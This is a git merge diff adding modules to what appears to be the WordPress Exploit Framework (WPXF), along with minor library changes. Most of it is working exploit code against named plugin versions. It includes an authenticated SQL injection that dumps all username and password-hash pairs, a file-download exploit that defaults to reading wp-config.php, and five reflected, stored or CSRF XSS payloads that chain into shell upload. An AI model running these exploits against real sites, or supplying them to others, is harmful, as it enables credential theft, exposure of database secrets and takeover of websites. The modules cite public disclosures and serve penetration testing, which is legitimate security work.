Merge branch 'development'

Author: rastating

lib/wpxf/net/cookie_jar.rb

@@ -4,7 +4,7 @@ module Net
     class CookieJar < Hash
       # @return [String] a cookie string.
       def to_s
-        map { |key, value| "#{key}=#{value}" }.join('; ')
+        map { |key, value| "#{key}=#{value};" }.join(' ')
       end
 
       # Parse a cookie into the {CookieJar}.

lib/wpxf/wordpress/stored_xss.rb

@@ -40,6 +40,12 @@ def store_script_and_validate
     false
   end
 
+  # Execute all tasks required before storing the script.
+  # @return [Boolean] return true if the prerequisite actions were successfully executed.
+  def before_store
+    true
+  end
+
   # @return [Number] The status code that is expected after storing the script.
   def expected_status_code_after_store
     200
@@ -48,7 +54,7 @@ def expected_status_code_after_store
   # Run the module.
   # @return [Boolean] true if successful.
   def run
-    return false unless super
+    return false unless super && before_store
 
     emit_info 'Storing script...'
     return false unless store_script_and_validate

modules/auxiliary/ultimate_product_catalogue_hash_dump.rb

@@ -0,0 +1,125 @@
+class Wpxf::Auxiliary::UltimateProductCatalogueHashDump < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
+      desc: %(
+        Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
+        which can be leveraged by all users with at least subscriber status. This
+        module utilises this vulnerability to dump the hashed passwords of all
+        users in the database.
+      ),
+      author: [
+        'Lenon Leite',                     # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8853'],
+        ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
+      ],
+      date: 'Jun 26 2017'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the hash dump to',
+        required: false
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('ultimate-product-catalogue', '4.2.3')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def export_path
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  def execute_sqli(payload)
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      cookie: session_cookie,
+      params: {
+        'action' => 'get_upcp_subcategories'
+      },
+      body: {
+        'CatID' => payload
+      }
+    )
+
+    return res.body if res && res.code == 200
+
+    if res
+      emit_error "Injection failed - request returned code #{res.code}"
+      return nil
+    end
+
+    emit_error 'Injection failed'
+    nil
+  end
+
+  def determine_prefix
+    eol_token = Utility::Text.rand_numeric(10)
+    payload = "0 union select table_name, #{eol_token} FROM information_schema.tables where table_schema = database()"
+
+    res = execute_sqli(payload)
+    return nil unless res
+
+    res[/,([^,]+?)usermeta,#{eol_token}/, 1]
+  end
+
+  def dump_and_parse_hashes(prefix)
+    eol_token = Utility::Text.rand_numeric(10)
+    payload = "0 UNION SELECT concat(user_login,0x3a,user_pass),#{eol_token} FROM #{prefix}users"
+
+    output = execute_sqli(payload)
+    pattern = /(.+?)\:(.+?),#{eol_token}[,0]?/
+    output.scan(pattern)
+  end
+
+  def output_as_table(creds)
+    rows = []
+    rows.push(user: 'Username', hash: 'Hash')
+    creds.each do |pair|
+      rows.push(user: pair[0], hash: pair[1])
+    end
+
+    emit_table rows
+  end
+
+  def export_creds(creds)
+    open(export_path, 'w') do |f|
+      creds.each do |pair|
+        f.puts "#{pair[0]}:#{pair[1]}"
+      end
+    end
+
+    emit_success "Saved dump to #{export_path}"
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Determining database prefix...'
+    prefix = determine_prefix
+    return false unless prefix
+    emit_success "Found prefix: #{prefix}", true
+
+    emit_info 'Dumping user hashes...'
+    creds = dump_and_parse_hashes(prefix)
+    output_as_table creds
+
+    export_creds(creds) if export_path
+    true
+  end
+end

modules/auxiliary/wp_hide_security_enhancer_file_download.rb

@@ -0,0 +1,49 @@
+class Wpxf::Auxiliary::WpHideSecurityEnhancerFileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Hide & Security Enhancer <= 1.3.9.2 File Download',
+      author: [
+        'Julio Potier',                   # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8867'],
+        ['URL', 'https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/']
+      ],
+      date: 'Jul 21 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-hide-security-enhancer', '1.3.9.3')
+  end
+
+  def default_remote_file_path
+    'wp-config.php'
+  end
+
+  def working_directory
+    'the WordPress installation directory'
+  end
+
+  def downloader_url
+    normalize_uri(wordpress_url_plugins, 'wp-hide-security-enhancer', 'router', 'file-process.php')
+  end
+
+  def download_request_params
+    { 'action' => 'style-clean', 'file_path' => "/#{remote_file}" }
+  end
+
+  def validate_content(content)
+    if content.empty?
+      emit_error 'No content returned, file may not exist.'
+      return false
+    end
+
+    true
+  end
+end

modules/exploits/all_in_one_migration_reflected_xss_shell_upload.rb

@@ -0,0 +1,31 @@
+class Wpxf::Exploit::AllInOneMigrationReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'All In One WP Migration <= 6.45 Reflected XSS Shell Upload',
+      author: [
+        '0w4ys',                          # Dislosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8851']
+      ],
+      date: 'Jun 20 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-wp-migration', '6.46')
+  end
+
+  def xss_payload
+    url_encode("\"}<img src=#{Utility::Text.rand_alpha(5)} onerror=#{xss_ascii_encoded_include_script}><!--")
+  end
+
+  def url_with_xss
+    "#{wordpress_url_admin_ajax}?action=ai1wm_status&secret_key=#{xss_payload}"
+  end
+end

modules/exploits/arabic_font_csrf_stored_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # Discovery + WPXF module
+      ],
+      references: [
+        ['WPVDB', '8868'],
+        ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss']
+      ],
+      date: 'Jul 18 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('arabic-font', '1.2.1')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php'),
+      'save1'              => 'Save changes',
+      'AF_fontfamily'      => 'JF Flat Jozoor',
+      'AF_fontsize'        => '18',
+      'AF_lineheight'      => '45',
+      'AF_textalign'       => 'Center',
+      'AF_defaultcssclass' => ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\"",
+      'AF_customcss'       => '',
+      'action'             => 'save'
+    )
+  end
+end

modules/exploits/download_manager_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::DownloadManagerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Download Manager <= 2.9.51 Reflected XSS Shell Upload',
+      author: [
+        'Tom Adams',                      # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8850'],
+        ['URL', 'https://security.dxw.com/advisories/xss-download-manager/']
+      ],
+      date: 'Jun 16 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('download-manager', 'readme.txt', '2.9.52')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin-ajax.php')
+  end
+
+  def xss_payload
+    url_encode("</script><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?action=wpdm_generate_password&id=#{xss_payload}"
+  end
+end

modules/exploits/popup_maker_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::PopupMakerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Popup Maker <= 1.6.4 Reflected XSS Shell Upload',
+      author: [
+        'Chris Liu',                      # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8878'],
+        ['CVE', '2017-2284'],
+        ['URL', 'https://jvn.jp/en/jp/JVN92921024/index.html']
+      ],
+      date: 'Jul 24 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('popup-maker', '1.6.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'edit.php')
+  end
+
+  def url_payload
+    url_encode("\"><svg onload=#{xss_ascii_encoded_include_script}>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?post_type=popup&page=pum-settings&tab=#{url_payload}"
+  end
+end

modules/exploits/responsive_lightbox_reflected_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+class Wpxf::Exploit::ResponsiveLightboxReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Responsive Lightbox <= 1.7.1 Reflected XSS Shell Upload',
+      author: [
+        'Chris Liu',                      # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8860'],
+        ['CVE', '2017-2243'],
+        ['URL', 'http://jvn.jp/en/jp/JVN39819446/index.html']
+      ],
+      date: 'Jul 04 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('responsive-lightbox', '1.7.2')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php')
+  end
+
+  def url_payload
+    url_encode("\"><svg onload=#{xss_ascii_encoded_include_script}><!--")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=responsive-lightbox&tab=configuration&section=#{url_payload}"
+  end
+end